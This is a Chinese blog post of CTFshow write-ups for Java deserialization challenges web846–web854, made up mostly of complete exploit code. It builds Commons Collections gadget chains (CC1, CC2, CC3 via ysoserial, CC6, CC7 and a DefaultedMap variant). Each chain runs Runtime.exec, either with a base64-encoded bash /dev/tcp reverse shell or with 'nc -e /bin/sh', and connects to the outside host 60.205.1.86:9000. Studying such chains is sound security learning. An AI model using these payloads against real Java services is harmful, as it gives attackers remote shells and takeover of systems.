CTFSHOW-Java反序列化

p0l1st Lv2
  2025-03-19 18:53:24 2025-03-19 18:53:24 Created   2025-03-20 17:16:48 2025-03-20 17:16:48 Updated    

web846

ctfshow会对你post提交的ctfshow参数进行base64解码
然后进行反序列化
构造出对当前题目地址的dns查询即可获得flag

web-chains,DNS域名改成靶机域名

image-20250318212559858

base64编码后POST传参

image-20250318212901618

web847

提交ctfshow参数进行base64解码
然后进行反序列化
我是java7,使用了commons-collections 3.1的库
为了保证业务安全,我删除了nc和curl命令
下面是我接收参数的代码
data=new BASE64Decoder().decodeBuffer(request.getParameter("ctfshow"));

CC1,bash反弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
package org.example;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class ctfshow {
    public static void main(String[] args) throws Exception{
        Transformer[] transformers =new Transformer[]
                {
                        new ConstantTransformer(Runtime.class),
                        new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
                        new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
                        new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC82MC4yMDUuMS44Ni85MDAwIDA+JjE=}|{base64,-d}|{bash,-i}"})
                };
        ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);
        HashMap<Object,Object> hashMap=new HashMap<Object,Object>();
        hashMap.put("value",chainedTransformer);
        Map<Object,Object> transformedMap =TransformedMap.decorate(hashMap,null,chainedTransformer);
        Class c= Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor annotationInvocationHandler=c.getDeclaredConstructor(Class.class, Map.class);
        annotationInvocationHandler.setAccessible(true);
        Object obj= annotationInvocationHandler.newInstance(Target.class,transformedMap);
        serialize(obj);
    }
    public static void serialize(Object obj) throws Exception{
        ByteArrayOutputStream data=new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(data);
        oos.writeObject(obj);
        oos.flush();
        oos.close();
        System.out.println(Base64.getEncoder().encodeToString(data.toByteArray()));
    }
}

URL编码一下

image-20250318235008473

image-20250318235025091

web848

提交ctfshow参数进行base64解码
然后进行反序列化
我是java7,使用了commons-collections 3.1的库
为了保证业务安全,我删除了nc和curl命令
甚至不准用TransformedMap类反序列化

还是CC3.1,提示不能用TransformedMap类,可以打LazyMapCC1或者其他不包含TransformedMap的链子

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import java.util.Base64;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;
import sun.reflect.annotation.*;

public class LazyExpFinal {
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class), //构造setValue的可控参数
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC82MC4yMDUuMS44Ni85MDAwIDA+JjE=}|{base64,-d}|{bash,-i}"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        HashMap<Object, Object> hashMap = new HashMap<>();
        Map decorateMap = LazyMap.decorate(hashMap, chainedTransformer);

        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor declaredConstructor = c.getDeclaredConstructor(Class.class, Map.class);
        declaredConstructor.setAccessible(true);
        InvocationHandler invocationHandler = (InvocationHandler) declaredConstructor.newInstance(Override.class, decorateMap);
        //设置动态代理
        Map proxyMap = (Map) Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{Map.class}, invocationHandler);
        //触发invoke
        invocationHandler = (InvocationHandler) declaredConstructor.newInstance(Override.class, proxyMap);
        serialize(invocationHandler);
//        unserialize("ser.bin");

    }

//    public static void serialize(Object obj) throws IOException {
//        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
//        oos.writeObject(obj);
//
//    }
    public static void serialize(Object obj) throws Exception{
        ByteArrayOutputStream data=new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(data);
        oos.writeObject(obj);
        oos.flush();
        oos.close();
        System.out.println(Base64.getEncoder().encodeToString(data.toByteArray()));
}

    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }

}
image-20250319003149054

web849

[!NOTE]

CC链之二,可以用nc反弹

提交ctfshow参数进行base64解码
然后进行反序列化
我是java8,使用了commons-collections 4.0的库
为了保证业务安全,我删除了nc和curl命令

CC4.0,直接打CC2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;

import javax.xml.transform.TransformerConfigurationException;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;
import java.util.PriorityQueue;


public class CC2Exp {
    public static void main(String[] args) throws Exception {
        TemplatesImpl templates = new TemplatesImpl();
        Class templatesClass = templates.getClass();
        Field nameField = templatesClass.getDeclaredField("_name");
        nameField.setAccessible(true);
        nameField.set(templates,"p0l1st");

        Field bytecodesField = templatesClass.getDeclaredField("_bytecodes");
        bytecodesField.setAccessible(true);
        byte[] evil = Files.readAllBytes(Paths.get("E://Calc.class"));
        byte[][] codes = {evil};
        bytecodesField.set(templates,codes);

        Field tfactoryField = templatesClass.getDeclaredField("_tfactory");
        tfactoryField.setAccessible(true);
        tfactoryField.set(templates,new TransformerFactoryImpl());
//        templates.newTransformer();
        InvokerTransformer invokerTransformer = new InvokerTransformer<>("newTransformer",new Class[]{},new Object[]{});

        TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1));
        PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);
        priorityQueue.add(templates);
        priorityQueue.add("p0l1st");

        Class c = transformingComparator.getClass();
        Field transformingField = c.getDeclaredField("transformer");
        transformingField.setAccessible(true);
        transformingField.set(transformingComparator,invokerTransformer);

        serialize(priorityQueue);
//        unserialize("ser.bin");


    }
//    public static void serialize(Object obj) throws IOException {
//        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
//        oos.writeObject(obj);
//    }
public static void serialize(Object obj) throws Exception{
    ByteArrayOutputStream data=new ByteArrayOutputStream();
    ObjectOutputStream oos = new ObjectOutputStream(data);
    oos.writeObject(obj);
    oos.flush();
    oos.close();
    System.out.println(Base64.getEncoder().encodeToString(data.toByteArray()));
}
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }
}
image-20250319004222204

web850

提交ctfshow参数进行base64解码
然后进行反序列化
我是java7,使用了commons-collections 3.1的库并对一些可能有危险的类进行了封禁,
为了保证业务安全,我删除了nc和curl命令

注意是java7,用CC3

1
java -jar ysoserial.jar CommonsCollections3 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC82MC4yMDUuMS44Ni85MDAwIDA+JjE=}|{base64,-d}|{bash,-i}"|base64
image-20250319164603499

web851

提交ctfshow参数进行base64解码
然后进行反序列化
我是java8,使用了commons-collections 4.0的库并对一些可能有危险的类进行了封禁,
为了保证业务安全,我删除了nc和curl命令

使用CC4,但是对一些类进行了封禁,那就不能用CC4和CC2了

基于CC7的野链

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
package ctfshow;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.apache.commons.collections4.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.util.*;

public class web851 {
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"nc 60.205.1.86:9000 -e /bin/sh"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(new Transformer[]{});
        HashMap<Object, Object> hashMap1 = new HashMap<>();
        HashMap<Object, Object> hashMap2 = new HashMap<>();
        Map decorateMap1 = LazyMap.lazyMap(hashMap1, chainedTransformer);
        decorateMap1.put("yy", 1);
        Map decorateMap2 = LazyMap.lazyMap(hashMap2, chainedTransformer);
        decorateMap2.put("zZ", 1);
        Hashtable hashtable = new Hashtable();
        hashtable.put(decorateMap1, 1);
        hashtable.put(decorateMap2, 1);

        Class c = ChainedTransformer.class;
        Field field = c.getDeclaredField("iTransformers");
        field.setAccessible(true);
        field.set(chainedTransformer, transformers);
        decorateMap2.remove("yy");

        serialize(hashtable);


    }
    public static void serialize(Object obj) throws Exception{
        ByteArrayOutputStream data=new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(data);
        oos.writeObject(obj);
        oos.flush();
        oos.close();
        System.out.println(Base64.getEncoder().encodeToString(data.toByteArray()));
    }



}

基于CC6的野链

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
package ctfshow;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.apache.commons.collections4.keyvalue.TiedMapEntry;
import org.apache.commons.collections4.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.util.*;
public class web851cc6 {
    public static void main(String[] args) throws Exception {
        Transformer[] tansformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"nc 60.205.1.86:9000 -e /bin/sh"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(tansformers);
        HashMap<Object,Object> map = new HashMap<Object,Object>();
        Map<Object,Object> lazymap = LazyMap.lazyMap(map,new ConstantTransformer(1));

        HashMap<Object,Object> map2 = new HashMap<>();

        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap,"p0");

        map2.put(tiedMapEntry,"p1");
        map.remove("p0");

        Class c = LazyMap.class;
        Field fieldfactory = c.getDeclaredField("factory");
        fieldfactory.setAccessible(true);
        fieldfactory.set(lazymap,chainedTransformer);
        serialize(map2);


    }
    public static void serialize(Object obj) throws Exception{
        ByteArrayOutputStream data=new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(data);
        oos.writeObject(obj);
        oos.flush();
        oos.close();
        System.out.println(Base64.getEncoder().encodeToString(data.toByteArray()));
    }
}

image-20250319170255757

web852

提交ctfshow参数进行base64解码
然后进行反序列化
我是java8,使用了commons-collections 4.0的库并对一些可能有危险的类进行了封禁,
为了保证业务安全,我删除了nc和curl命令

同web851

web853

提交ctfshow参数进行base64解码
然后进行反序列化
我是java8,使用了commons-collections 4.0的库并对一些可能有危险的类进行了封禁,
为了保证业务安全,我删除了nc和curl命令

用web851的CC7

image-20250319170725730

web854

提交ctfshow参数进行base64解码
然后进行反序列化
我是java8,使用了commons-collections 4.0的库并对一些可能有危险的类进行了封禁,包含:

  • TransformedMap
  • PriorityQueue
  • InstantiateTransformer
  • TransformingComparator
  • TemplatesImpl
  • AnnotationInvocationHandler
  • HashSet
  • Hashtable
  • LazyMap

boogipop师傅的CC6+CC4,把LazyMap换成DefaultedMap

1
2
3
4
5
6
7
8
9
10
11
Gadget chain:
	    java.io.ObjectInputStream.readObject()
            java.util.HashMap.readObject()
                java.util.HashMap.hash()
                    org.apache.commons.collections4.keyvalue.TiedMapEntry.hashCode()
                    org.apache.commons.collections4.keyvalue.TiedMapEntry.getValue()
                        org.apache.commons.collections4.map.DefaultedMap.get()
                            org.apache.commons.collections4.functors.ChainedTransformer.transform()
                            org.apache.commons.collections4.functors.InvokerTransformer.transform()
                            java.lang.reflect.Method.invoke()
                                java.lang.Runtime.exec()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
package ctfshow;

import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.apache.commons.collections4.keyvalue.TiedMapEntry;
import org.apache.commons.collections4.map.DefaultedMap;

import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;


public class web854cc6 {
    public static void main(String[] args) throws Exception{
        Transformer[] tansformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"nc 60.205.1.86 9000 -e /bin/sh"})
        };
        Transformer transformerchain = new ChainedTransformer(new Transformer[] {});
        ChainedTransformer chainedTransformer = new ChainedTransformer(tansformers);
        HashMap<Object,Object> map = new HashMap<Object,Object>();
        HashMap<Object,Object> map2 = new HashMap<Object,Object>();

        Class<DefaultedMap> d = DefaultedMap.class;
        Constructor<DefaultedMap> defaultedMapConstructor = d.getDeclaredConstructor(Map.class,Transformer.class);
        defaultedMapConstructor.setAccessible(true);
        DefaultedMap defaultedMap = defaultedMapConstructor.newInstance(map,transformerchain);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(defaultedMap,"p0");
        map2.put(tiedMapEntry,"p1");
        map.remove("p0");

        Field iTransformers = ChainedTransformer.class.getDeclaredField("iTransformers");
        iTransformers.setAccessible(true);
        iTransformers.set(transformerchain,tansformers);

        serialize(map2);

    }
    public static void serialize(Object obj) throws Exception{
        ByteArrayOutputStream data=new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(data);
        oos.writeObject(obj);
        oos.flush();
        oos.close();
        System.out.println(Base64.getEncoder().encodeToString(data.toByteArray()));
    }

}

image-20250319184548067

  • Title: CTFSHOW-Java反序列化
  • Author: p0l1st
  • Created at : 2025-03-19 18:53:24
  • Updated at : 2025-03-20 17:16:48
  • Link: https://blog.p0l1st.top/2025/03/19/CTFSHOW-Java反序列化/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
CTFSHOW-Java反序列化
  1. web846
  2. web847
  3. web848
  4. web849
  5. web850
  6. web851
  7. web852
  8. web853
  9. web854